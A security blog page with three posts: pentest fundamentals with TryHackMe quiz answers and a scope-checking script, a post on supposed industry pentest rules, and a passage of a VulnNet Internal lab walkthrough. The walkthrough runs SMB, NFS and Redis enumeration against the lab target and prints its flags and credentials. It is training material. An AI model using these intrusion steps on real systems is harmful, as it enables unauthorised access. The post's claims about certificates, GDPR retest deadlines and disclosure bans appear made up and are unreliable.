Showing posts with label penetration testing. Show all posts
  • Penetration Testing Fundamentals

     

     

    Penetration Testing Fundamentals




    What is Penetration Testing?


     

    Learn the important ethics and methodologies behind every pentest.
     

    Before teaching you the technical, hands-on aspects of ethical hacking, you'll need to understand more about what a penetration tester's job responsibilities are and what processes are followed when performing pentests (finding vulnerabilities in a client's application or system).


    The importance and relevance of cybersecurity are ever-increasing and can be felt in every walk of life. News headlines fill our screens, reporting yet another hack or data leak.


    Cybersecurity is relevant to everyone in the modern world, from individuals who need a strong password policy to protect their email, to businesses and other organisations that need to protect both devices and data from damage.


    A penetration test, or pentest, is an ethically-driven attempt to test and analyse the security defences that protect these assets and pieces of information. A penetration test involves using the same tools, techniques and methodologies that someone with malicious intent would use, and in that sense it is similar to an audit.


    According to Security Magazine, a cybersecurity industry magazine, there are over 2,200 cyber attacks every day - 1 attack every 39 seconds.






    Penetration Testing Ethics

     
    The question of legality and ethics in cybersecurity, let alone in penetration testing, is always controversial. Labels like "hacking" and "hacker" often hold negative connotations, especially in pop culture, thanks to a few bad apples. The idea of legally gaining access to a computer system is a challenging concept to grasp; after all, what makes it legal exactly?

    Recall that a penetration test is an authorised audit of a computer system's security and defences, as agreed by the owners of the systems. The legality of penetration testing is pretty clear-cut in this sense: anything that falls outside of this agreement is deemed unauthorised.

    Before a penetration test starts, a formal discussion occurs between the penetration tester and the system owner. Various tools, techniques, and systems to be tested are agreed on. This discussion forms the scope of the penetration testing agreement and will determine the course the penetration test takes.

    Companies that provide penetration testing services are held to legal frameworks and industry accreditation. For example, the National Cyber Security Centre (NCSC) runs the CHECK accreditation scheme in the UK. This means that only "[CHECK] approved companies can conduct authorised penetration tests of public sector and CNI systems and networks." (NCSC).

    Ethics is the moral debate between right and wrong; where an action may be legal, it may go against an individual's belief system of right and wrong.

    Penetration testers will often be faced with potentially morally questionable decisions during a penetration test: for example, gaining access to a database and being presented with potentially sensitive data, or performing a phishing attack on an employee to test an organisation's human security. If that action has been agreed upon during the initial stages, it is legal, however ethically questionable.

    Hackers are sorted into three hats, where their ethics and the motivations behind their actions determine which hat category they are placed into. Let's cover these three below:

    White Hat
        These hackers are considered the "good people". They remain within the law and use their skills to benefit others.
        Example: a penetration tester performing an authorised engagement on a company.

    Grey Hat
        These people often use their skills to benefit others; however, they do not respect or follow the law or ethical standards at all times.
        Example: someone taking down a scamming site.

    Black Hat
        These people are criminals and often seek to damage organisations or gain some form of financial benefit at the cost of others.
        Example: ransomware authors infecting devices with malicious code and holding data for ransom.

    Rules of Engagement (ROE)


    The ROE is a document that is created at the initial stages of a penetration testing engagement. This document consists of three main sections (explained below), which are ultimately responsible for deciding how the engagement is carried out. The SANS Institute has a great example of this document which you can view online here.

    Permission
        This section of the document gives explicit permission for the engagement to be carried out. This permission is essential to legally protect individuals and organisations for the activities they carry out.

    Test Scopes
        This section of the document annotates the specific targets to which the engagement applies. For example, the penetration test may only apply to certain servers or applications, but not the entire network.

    Rules
        The rules section defines exactly which techniques are permitted during the engagement. For example, the rules may specifically state that techniques such as phishing attacks are prohibited, but MITM (Man-in-the-Middle) attacks are allowed.

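    The Test Scopes section is the part of the ROE a tester consults most often once the engagement starts, and it is safer to encode it than to check targets by eye before every scan. The following is an added example, written for this page and not taken from TryHackMe or the original post: a small Python pre-flight check that refuses any target the ROE does not explicitly cover. The network ranges, hostnames and the excluded gateway address are constructed placeholders.

```python
import ipaddress

# Constructed example scope (placeholders, not a real engagement):
# only these ranges/hosts were agreed in the ROE, and one address is
# explicitly excluded even though it sits inside an in-scope range.
IN_SCOPE_NETWORKS = ["10.10.155.0/24", "192.0.2.0/28"]
IN_SCOPE_HOSTS = {"app.example.test", "mail.example.test"}
EXCLUDED = ["10.10.155.1"]  # e.g. the client's gateway, declared out of bounds


def _contains(ranges, ip):
    """True if ip falls inside any of the given CIDR or single-host strings."""
    return any(ip in ipaddress.ip_network(r, strict=False) for r in ranges)


def is_in_scope(target, networks=IN_SCOPE_NETWORKS, hosts=IN_SCOPE_HOSTS, excluded=EXCLUDED):
    """Default-deny: a target is in scope only if the ROE lists it.

    IP addresses are checked against the agreed ranges minus the exclusions;
    anything that is not an IP literal is treated as a hostname and must match
    the agreed host list exactly (case-insensitive), with no DNS lookups.
    """
    try:
        ip = ipaddress.ip_address(target.strip())
    except ValueError:
        return target.strip().lower() in {h.lower() for h in hosts}
    if _contains(excluded, ip):
        return False
    return _contains(networks, ip)


def split_targets(targets, **scope):
    """Partition a candidate target list into (allowed, rejected)."""
    allowed, rejected = [], []
    for t in targets:
        (allowed if is_in_scope(t, **scope) else rejected).append(t)
    return allowed, rejected


if __name__ == "__main__":
    candidates = ["10.10.155.145", "10.10.155.1", "10.10.156.7",
                  "APP.example.test", "intranet.example.test"]
    ok, bad = split_targets(candidates)
    print("in scope:    ", ok)
    print("out of scope:", bad)
```

    Hostnames are matched literally on purpose: a name that happens to resolve into an in-scope range is not treated as in scope, because the ROE may list individual hosts rather than the range they live in, and because a DNS answer can point at a third party's address.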

    1) You are given permission to perform a security audit on an organisation; what type of hacker would you be?

    Ans- White Hat



    2) You attack an organisation and steal their data, what type of hacker would you be?

    Ans- Black Hat



    3) What document defines how a penetration testing engagement should be carried out?

    Ans- Rules of Engagement


     

     

    Penetration Testing Methodologies


    Penetration tests can have a wide variety of objectives and targets within scope. Because of this, no two penetration tests are the same, and there is no one-size-fits-all approach to how a penetration tester should proceed.

    The steps a penetration tester takes during an engagement are known as the methodology. A practical methodology is a smart one, where the steps taken are relevant to the situation at hand. For example, a methodology you would use to test the security of a web application is not practical when you have to test the security of a network.


    Before discussing some different industry-standard methodologies, we should note that all of them share the following general stages:

    Information Gathering
        Collecting as much publicly accessible information about a target/organisation as possible, for example OSINT and research. Note: this does not involve scanning any systems.

    Enumeration/Scanning
        Discovering the applications and services running on the systems. For example, finding a web server that may be potentially vulnerable.

    Exploitation
        Leveraging vulnerabilities discovered on a system or application. This can involve the use of public exploits or exploiting application logic.

    Privilege Escalation
        Once you have successfully exploited a system or application (known as a foothold), this stage is the attempt to expand your access. You can escalate horizontally or vertically: horizontal escalation is accessing another account in the same permission group (i.e. another user), whereas vertical escalation is gaining an account in a higher permission group (i.e. an administrator).

    Post Exploitation
        This stage involves a few sub-stages:
        1. What other hosts can be targeted (pivoting)
        2. What additional information can we gather from the host now that we are a privileged user
        3. Covering your tracks
        4. Reporting


    OSSTMM


    The Open Source Security Testing Methodology Manual provides a detailed framework of testing strategies for systems, software, applications, communications and the human aspect of cybersecurity.


    The methodology focuses primarily on how these systems and applications communicate, so it includes a methodology for:

    • Telecommunications (phones, VoIP, etc.)
    • Wired networks
    • Wireless communications

    Advantages:
    • Covers various testing strategies in depth.
    • Includes testing strategies for specific targets (i.e. telecommunications and networking).
    • The framework is flexible depending upon the organisation's needs.
    • The framework is meant to set a standard for systems and applications, meaning that a universal methodology can be used in a penetration testing scenario.

    Disadvantages:
    • The framework is difficult to understand, very detailed, and tends to use unique definitions.

    OWASP


    The "Open Web Application Security Project" framework is a community-driven and frequently updated framework used solely to test the security of web applications and services.


    The foundation regularly publishes reports listing the top ten security vulnerabilities a web application may have, together with the testing approach and remediation.

    Advantages:
    • Easy to pick up and understand.
    • Actively maintained and frequently updated.
    • Covers all stages of an engagement: from testing to reporting and remediation.
    • Specialises in web applications and services.

    Disadvantages:
    • It may not be clear what type of vulnerability a web application has (they can often overlap).
    • OWASP does not make suggestions about any specific software development life cycle.
    • The framework doesn't hold any accreditation such as CHECK.

     


    NIST Cybersecurity Framework 1.1


    The NIST Cybersecurity Framework is a popular framework used to improve an organisation's cybersecurity standards and manage the risk of cyber threats. This framework is a bit of an honourable mention because of its popularity and detail.


    The framework provides guidelines on security controls and benchmarks for success for organisations from critical infrastructure (power plants, etc.) through to commercial businesses. There is only a limited section giving a standard guideline for the methodology a penetration tester should take.

    Advantages:
    • The NIST Framework is estimated to be used by 50% of American organisations by 2020.
    • The framework is extremely detailed in setting standards to help organisations mitigate the threat posed by cyber threats.
    • The framework is very frequently updated.
    • NIST provides accreditation for organisations that use this framework.
    • The NIST framework is designed to be implemented alongside other frameworks.

    Disadvantages:
    • NIST has many iterations of frameworks, so it may be difficult to decide which one applies to your organisation.
    • The NIST framework has weak auditing policies, making it difficult to determine how a breach occurred.
    • The framework does not consider cloud computing, which is quickly becoming increasingly popular for organisations.

    NCSC CAF


    The Cyber Assessment Framework (CAF) is an extensive framework of fourteen principles used to assess the risk of various cyber threats and an organisation's defences against these.


    The framework applies to organisations considered to perform "vitally important services and activities" such as critical infrastructure, banking, and the like. The framework mainly focuses on and assesses the following topics:

    • Data security
    • System security
    • Identity and access control
    • Resiliency
    • Monitoring
    • Response and recovery planning

    Advantages:
    • This framework is backed by a government cybersecurity agency.
    • This framework provides accreditation.
    • This framework covers fourteen principles which range from security to response.

    Disadvantages:
    • The framework is still new in the industry, meaning that organisations haven't had much time to make the necessary changes to be suitable for it.
    • The framework is based on principles and ideas and isn't as direct as having rules like some other frameworks.

    1) What stage of penetration testing involves using publicly available information?

    Ans- Information Gathering




    2) If you wanted to use a framework for pentesting telecommunications, what framework would you use? Note: We're looking for the acronym here and not the full name.

    Ans- OSSTMM



    3) What framework focuses on the testing of web applications?

    Ans- OWASP



     

     

    Black box, White box, Grey box Penetration Testing

    

    There are three primary scopes when testing an application or service. Your understanding of your target determines the level of testing you perform in your penetration testing engagement. In this task, we'll cover these three different scopes of testing.

    Black-Box Testing


    This testing process is a high-level process where the tester is not given any information about the inner workings of the application or service.


    The tester acts as a regular user testing the functionality and interaction of the application or piece of software. This testing can involve interacting with the interface, i.e. buttons, and testing to see whether the intended result is returned. No knowledge of programming or understanding of the programme is necessary for this type of testing.


    Black-Box testing significantly increases the amount of time spent during the information gathering and enumeration phase to understand the attack surface of the target.





    Grey-Box Testing


    This testing process is the most popular for penetration testing. It is a combination of the black-box and white-box testing processes: the tester has some limited knowledge of the internal components of the application or piece of software, but still interacts with it as in a black-box scenario, using that knowledge to resolve issues as they are found.


    With Grey-Box testing, the limited knowledge given saves time, and is often chosen for extremely well-hardened attack surfaces.






    White-Box Testing


    This testing process is a low-level process usually done by a software developer who knows programming and application logic. The tester will be testing the internal components of the application or piece of software and, for example, ensuring that specific functions work correctly and within a reasonable amount of time.


    The tester has full knowledge of the application and its expected behaviour. White-box testing is much more time-consuming than black-box testing, but that full knowledge provides a testing approach that allows the entire attack surface to be validated.



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



  • The Hidden Agenda Of Companies Penetration Testing Rule

     

     

    The Hidden Agenda Of Companies Penetration Testing Rule


    So guys, today's blog is very important and informative. Today's topic is what actually happens in a real-life penetration test.

    There are many rules and regulations for a beginner pentester in a company, so in today's blog I will share the steps you have to follow while doing a pentest.

    What are the steps when you work in a real company as a pentester? If you want to know, read this blog till the end. Let's begin.

    Firstly, a proper agreement is made defining your scope, which states what you can do and what you can't.

    The company may specify that you can't use automated tools, so sometimes you have to exploit manually. There is usually no restriction on programming: you can write any program you need and use it.



    Now an interesting point: if you run a pentesting company and are in the middle of an engagement, your client can't change or deploy anything on the systems under test; that is part of the rules. Suppose you have found all the vulnerabilities and written a proper report; the pentesting company then hands its client a red card.

    This is basically a red certificate saying that the pentest has been completed and the report submitted. After that, the client has 30 days to fix all the vulnerabilities. When they are fixed, the client informs the pentesting company, which re-tests the client's servers using the same methods as before. If all the vulnerabilities have been patched, the pentesting company issues a green certificate.


    Now, let's come to the rules. These are specific to European countries. GDPR applies there: if somehow employee data gets leaked, the regulator can fine the company, and if any critical vulnerabilities are found, the company will have to do a pentest again within 2 months. This rule is for European countries.


    Hope you remember I told you that once a pentest is done, the client has only 1 month to patch all the vulnerabilities. If the client doesn't respond in that time and the pentesting company finds a new bug on the 31st day, they will charge the client company. That's a rule too.



    Now, if a pentest is done and a bug is found within 3 months of the previous pentest, they can't submit it, otherwise they will face legal consequences: if a new bug comes out within 3 months, it is considered that they knew about it but didn't disclose it, so legal problems can occur. There is also a disclosure policy under which you cannot share any pentest report within 3 months; you cannot share anything regarding it. There are so many rules, and it totally depends on the country and the company.



    Hope you liked today's blog, and don't forget to share. You can't find this type of blog anywhere else; it's a very little-known topic. I would also like to give a big shoutout to Trident Security.






  • TryHackMe VulnNet Internal As a Penetration Testing

     

     

    TryHackMe VulnNet Internal As a Penetration Testing

     

     

    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. It's a comfortable way to learn, using pre-designed courses which include virtual machines (VMs) hosted in the cloud.

    While using a question-answer model does make learning easier, TryHackMe also allows users to create their own virtual classrooms to teach particular topics, enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.

    Room description: VulnNet Entertainment learns from its mistakes, and now they have something new for you...

    We start the room with a quick scan of all ports using threader3000, while simultaneously running an nmap service and OS detection scan across all ports (-p-) to see exactly what is listening:

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo nmap -A -T4 -Pn  -sV -vv -p- 10.10.155.145
    [sudo] password for hackerboy: 
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:10 IST
    NSE: Loaded 153 scripts for scanning.
    NSE: Script Pre-scanning.
    Scanning 10.10.155.145 [65535 ports]
    Discovered open port 111/tcp on 10.10.155.145
    Discovered open port 22/tcp on 10.10.155.145
    Discovered open port 139/tcp on 10.10.155.145
    Discovered open port 445/tcp on 10.10.155.145
    Discovered open port 45811/tcp on 10.10.155.145
    Discovered open port 51665/tcp on 10.10.155.145
    Discovered open port 57017/tcp on 10.10.155.145
    Discovered open port 39557/tcp on 10.10.155.145
    Discovered open port 2049/tcp on 10.10.155.145
    Discovered open port 6379/tcp on 10.10.155.145
    Discovered open port 873/tcp on 10.10.155.145
    Completed SYN Stealth Scan at 19:19, 520.86s elapsed (65535 total ports)
    Nmap scan report for 10.10.155.145
    Host is up, received user-set (0.21s latency).
    Scanned at 2021-05-10 19:10:58 IST for 561s
    Not shown: 65523 closed ports
    Reason: 65523 resets
    PORT      STATE    SERVICE     REASON         VERSION
    22/tcp    open     ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
    |   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
    |   256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
    111/tcp   open     rpcbind     syn-ack ttl 63 2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  3           2049/udp   nfs
    |   100003  3           2049/udp6  nfs
    |   100003  3,4         2049/tcp   nfs
    |   100003  3,4         2049/tcp6  nfs
    |   100005  1,2,3      40068/udp6  mountd
    |   100005  1,2,3      51665/tcp   mountd
    |   100005  1,2,3      51843/tcp6  mountd
    |   100005  1,2,3      56229/udp   mountd
    |   100021  1,3,4      39572/udp6  nlockmgr
    |   100021  1,3,4      39935/tcp6  nlockmgr
    |   100021  1,3,4      45811/tcp   nlockmgr
    |   100021  1,3,4      48120/udp   nlockmgr
    |   100227  3           2049/tcp   nfs_acl
    |   100227  3           2049/tcp6  nfs_acl
    |   100227  3           2049/udp   nfs_acl
    |_  100227  3           2049/udp6  nfs_acl
    139/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
    873/tcp   open     rsync       syn-ack ttl 63 (protocol version 31)
    2049/tcp  open     nfs_acl     syn-ack ttl 63 3 (RPC #100227)
    6379/tcp  open     redis       syn-ack ttl 63 Redis key-value store
    9090/tcp  filtered zeus-admin  no-response
    39557/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
    45811/tcp open     nlockmgr    syn-ack ttl 63 1-4 (RPC #100021)
    51665/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
    57017/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=5/10%OT=22%CT=1%CU=40428%PV=Y%DS=2%DC=T%G=Y%TM=60993A1
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)
    
    Uptime guess: 30.994 days (since Fri Apr  9 19:28:16 2021)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=262 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap done: 1 IP address (1 host up) scanned in 562.27 seconds
               Raw packets sent: 69689 (3.070MB) | Rcvd: 70367 (3.159MB)
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo nmap -p 445  --script=smb-enum-shares.nse, smb-enum-users.nse  10.10.155.145
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:46 IST
    Failed to resolve "smb-enum-users.nse".
    Nmap scan report for 10.10.155.145
    Host is up (0.21s latency).
    
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares: 
    |   account_used: guest
    |   \\10.10.155.145\IPC$: 
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: IPC Service (vulnnet-internal server (Samba, Ubuntu))
    |     Users: 1
    |     Max Users: 
    |     Path: C:\tmp
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\10.10.155.145\print$: 
    |     Type: STYPE_DISKTREE
    |     Comment: Printer Drivers
    |     Users: 0
    |     Max Users: 
    |     Path: C:\var\lib\samba\printers
    |     Anonymous access: 
    |     Current user access: 
    |   \\10.10.155.145\shares: 
    |     Type: STYPE_DISKTREE
    |     Comment: VulnNet Business Shares
    |     Users: 0
    |     Max Users: 
    |     Path: C:\opt\shares
    |     Anonymous access: READ/WRITE
    |_    Current user access: READ/WRITE
    
    Nmap done: 1 IP address (1 host up) scanned in 32.14 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 

    Note the stray space after the comma in the --script list above: nmap treated smb-enum-users.nse as a second target (hence "Failed to resolve"), so only smb-enum-shares actually ran. Script names must be comma-separated without spaces, i.e. --script=smb-enum-shares,smb-enum-users. Even so, the output already tells us that the shares share (and IPC$) allow anonymous READ/WRITE access.

    After going through the whole nmap output, we have several services to enumerate: SMB (139/445), NFS (2049 plus the RPC ports), rsync (873) and Redis (6379). We will start with SMB.


    SMB Enumeration: 139 & 445

    We run the enum4linux tool from our machine against the vulnerable machine's IP:

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ enum4linux 10.10.155.145                                                   
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 10 19:11:45 2021
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 10.10.155.145
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
    
     ========================================== 
    |    Share Enumeration on 10.10.155.145    |
     ========================================== 
    
            Sharename       Type      Comment
            ---------       ----      -------
            print$          Disk      Printer Drivers
            shares          Disk      VulnNet Business Shares
            IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
    SMB1 disabled -- no workgroup available
    
    [+] Attempting to map shares on 10.10.155.145
    //10.10.155.145/print$  Mapping: DENIED, Listing: N/A
    //10.10.155.145/shares  Mapping: OK, Listing: OK
    //10.10.155.145/IPC$    [E] Can't understand response:
    NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
    
     ===================================================== 
    |    www.kumaratuljaiswal.in www.hackingtruth.in     |
     ===================================================== 
    
    
    enum4linux complete on Mon May 10 19:27:33 2021

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ 

    I can connect to the shares without supplying a password:

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ sudo smbclient //10.10.155.145/shares
    Enter WORKGROUP\root's password: 
    Try "help" to get a list of possible commands.            
    smb: \> ls
    
      temp                                D        0  Sat Feb  6 17:15:10 2021
      data                                D        0  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275872 blocks available
    
    smb: \> cd temp
    smb: \temp\> ls
    
      services.txt                        N       38  Sat Feb  6 17:15:09 2021
    
                    11309648 blocks of size 1024. 3275872 blocks available
    smb: \temp\> get services.txt
    getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) 
    smb: \temp\> cd ..
    smb: \> ls
    
      temp                                D        0  Sat Feb  6 17:15:10 2021
      data                                D        0  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275868 blocks available
    smb: \> cd data
    smb: \data\> ls
    
      data.txt                            N       48  Tue Feb  2 14:51:18 2021
      business-req.txt                    N      190  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275868 blocks available
    smb: \data\> get data.txt
    getting file \data\data.txt of size 48 as data.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    smb: \data\> get business-req.txt
    getting file \data\business-req.txt of size 190 as business-req.txt (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec)
    smb: \data\> ls
    
      data.txt                            N       48  Tue Feb  2 14:51:18 2021
      business-req.txt                    N      190  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275868 blocks available
    smb: \data\> cd 
    smb: \> pwd
    Current directory is \\10.10.155.145\shares\
    smb: \> exit
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]

    Browsing around the SMB shares, only one file contains useful information: services.txt.

    So, as you can see, downloading and reading this file gives me the first flag.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ cat services.txt    
    THM{0a09d51e488f5fa105d8d866a497440a}
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ cat data.txt    
    Purge regularly data that is not needed anymore
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ cat business-req.txt
    We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
    If you have any questions, please text or phone us.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$                          

    I also found NFS open, so I can check whether I can mount anything.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo showmount -e 10.10.155.145               
    Export list for 10.10.155.145:
    /opt/conf *
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$

    Exploit

    We start by listing the shares available to be mounted from the server using showmount, then we mount the share on our local machine in the conf directory.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ mkdir conf            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo mount -t nfs 10.10.155.145:/opt/conf conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ls
    conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ cd conf  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
    └─$ ls
    hp  init  opt  profile.d  redis  vim  wildmidi
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
    └─$ cd redis 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ ls
    redis.conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$    

    Enumerating the share, we quickly dive down to the redis directory and find notable information in the redis.conf file (save this password somewhere).

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ ls
    redis.conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ cat redis.conf 
    # Redis configuration file example.
    #
    
    # If the master is password protected (using the "requirepass" configuration
    # directive below) it is possible to tell the slave to authenticate before
    # starting the replication synchronization process, otherwise the master will
    # refuse the slave request.
    #
    # masterauth 
    
    requirepass "B65Hx562F@ggAZ@F"
    #
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ 

    Redis Enumeration: 6379

    Redis (the Remote Dictionary Server) is an in-memory database. We could enumerate Redis with Netcat, the MSF auxiliary scanner, or redis-cli.

    But first you need to install redis-cli on your Linux system:

    apt-get install redis-tools

    Using redis-cli, which is the best option in my opinion, we connect to the Redis server with the credentials we found in the mount earlier, then query it for the list of keys and the content it holds.

    I found a redis password, so I can use this to login to the open redis port

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
    Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
    10.10.155.145:6379> keys *
    1) "marketlist"
    2) "tmp"
    3) "internal flag"
    4) "int"
    5) "authlist"
    10.10.155.145:6379> get "internal flag"
    "THM{ff8e518addbbddb74531a724236a8221}"
    10.10.155.145:6379> 

    A list of useful commands can be found at https://redis.io/commands. After playing around, and through trial and error, I was finally able to locate the internal flag.

    Once again, after trying different commands, I was finally able to access the authlist.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
    Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
    10.10.155.145:6379> keys *
    1) "marketlist"
    2) "tmp"
    3) "internal flag"
    4) "int"
    5) "authlist"
    10.10.155.145:6379> type authlist
    list                                                                                                                                            
    10.10.155.145:6379> lrange authlist 1 100
    1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                           
    2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                                       
    3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                                       
    10.10.155.145:6379> 

    Decoding the cypher

    From the look of it, we can tell that it's encoded in base64. Let's decode it.

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
    Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
